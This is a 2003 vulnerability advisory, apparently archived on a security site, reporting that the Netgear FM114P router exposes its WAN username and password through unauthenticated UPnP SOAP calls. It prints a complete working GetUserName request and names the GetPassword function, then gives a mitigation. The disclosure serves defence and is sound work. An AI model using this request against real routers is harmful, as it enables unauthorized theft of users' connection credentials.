logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

Netgear FM114P ProSafe Wireless Router WAN Username and Password Retrieval Vulnerability
Date: 2003-04-05

Author : Björn Stickler <stickler@rbg.informatik.tu-darmstadt.de>

hi, i found another security problem in netgear prosafe wireless router model FM114P:
when remote-access and upnp features are enabled, the WAN connection username and password can be retrieved without any authentication using upnp. if remote management is enabled anyone can do this from the web. this is done by using upnp soap requests to the router with the functions GetUserName and GetPassword. i don´t know why such functions exist, because router configuration is normally done via web-interface.

---- begin of example request to get username --------------

POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:GetUserName
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
</s:Body>
</s:Envelope>

---- end of example request to get username --------------

affected firmware versions: --> v1.4 Beta Release 21 has been tested --> all previous versions with upnp may be affected

solution: disable remote management and/or upnp until bug is fixed by netgear

regards, b.stickler

http://intex.ath.cx



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy